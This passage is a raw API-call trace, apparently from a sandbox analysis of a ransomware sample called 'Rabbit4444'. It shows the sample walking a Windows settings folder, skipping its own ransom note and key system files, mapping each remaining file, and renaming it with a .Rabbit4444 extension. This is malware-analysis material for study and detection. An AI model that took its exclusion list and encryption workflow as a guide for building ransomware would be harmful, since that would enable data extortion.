"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_developermodegroup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_developermodegroup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.929] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14cd229a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x14cd229a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", cAlternateFileName="AA2361~1.SET")) returned 1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2=".") returned 1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="..") returned 1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="windows") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="boot") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.929] lstrcmpiW (lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.929] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms" | out: lpString1="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms") returned="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms" [0056.929] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.930] lstrlenW (lpString="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms") returned 51 [0056.930] lstrlenW (lpString="Rabbit4444") returned 10 [0056.930] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.930] lstrlenW (lpString=".dll") returned 4 [0056.930] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.930] lstrlenW (lpString=".lnk") returned 4 [0056.930] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.930] lstrlenW (lpString=".ini") returned 4 [0056.930] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.930] lstrlenW (lpString=".sys") returned 4 [0056.930] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.930] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_devicediscoverygroup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.930] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.930] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14824096430) returned 1 [0056.930] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1154) returned 1 [0056.930] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.930] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.930] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.931] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.932] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.933] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14824336309) returned 1 [0056.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.933] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.933] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.933] CloseHandle (hObject=0x298) returned 1 [0056.933] CloseHandle (hObject=0x278) returned 1 [0056.933] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms.Rabbit4444") returned 179 [0056.933] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_devicediscoverygroup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_devicediscoverygroup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.934] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14ec2151, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x14ec2151, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", cAlternateFileName="AAA_SY~1.SET")) returned 1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2=".") returned 1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="..") returned 1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="windows") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="boot") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.934] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.934] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms" [0056.934] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.935] lstrlenW (lpString="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms") returned 66 [0056.935] lstrlenW (lpString="Rabbit4444") returned 10 [0056.935] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.935] lstrlenW (lpString=".dll") returned 4 [0056.935] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.935] lstrlenW (lpString=".lnk") returned 4 [0056.935] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.935] lstrlenW (lpString=".ini") returned 4 [0056.935] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.935] lstrlenW (lpString=".sys") returned 4 [0056.935] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_cursorthickness.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.935] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.936] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14824628001) returned 1 [0056.936] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1296) returned 1 [0056.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0056.936] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0056.937] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0056.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.938] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14824875176) returned 1 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.938] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0056.938] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.938] CloseHandle (hObject=0x298) returned 1 [0056.938] CloseHandle (hObject=0x278) returned 1 [0056.938] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms.Rabbit4444") returned 194 [0056.938] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_cursorthickness.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_cursorthickness.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.939] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1842c8c1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1842c8c1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x524, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~2.SET")) returned 1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.939] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.939] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms" [0056.940] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.940] lstrlenW (lpString="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms") returned 70 [0056.940] lstrlenW (lpString="Rabbit4444") returned 10 [0056.940] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.940] lstrlenW (lpString=".dll") returned 4 [0056.940] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.940] lstrlenW (lpString=".lnk") returned 4 [0056.940] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.940] lstrlenW (lpString=".ini") returned 4 [0056.940] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.940] lstrlenW (lpString=".sys") returned 4 [0056.940] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isanimationsenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.940] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.940] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14825107023) returned 1 [0056.940] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1316) returned 1 [0056.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0056.940] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0056.942] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0056.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.943] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14825384026) returned 1 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0056.943] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.943] CloseHandle (hObject=0x298) returned 1 [0056.943] CloseHandle (hObject=0x278) returned 1 [0056.943] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms.Rabbit4444") returned 198 [0056.943] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isanimationsenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isanimationsenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.944] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18b79b72, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x18b79b72, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~3.SET")) returned 1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.944] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.944] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms" [0056.944] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.945] lstrlenW (lpString="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms") returned 69 [0056.945] lstrlenW (lpString="Rabbit4444") returned 10 [0056.945] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.945] lstrlenW (lpString=".dll") returned 4 [0056.945] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.945] lstrlenW (lpString=".lnk") returned 4 [0056.945] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.945] lstrlenW (lpString=".ini") returned 4 [0056.945] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.945] lstrlenW (lpString=".sys") returned 4 [0056.945] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_ismousekeysenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.945] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: 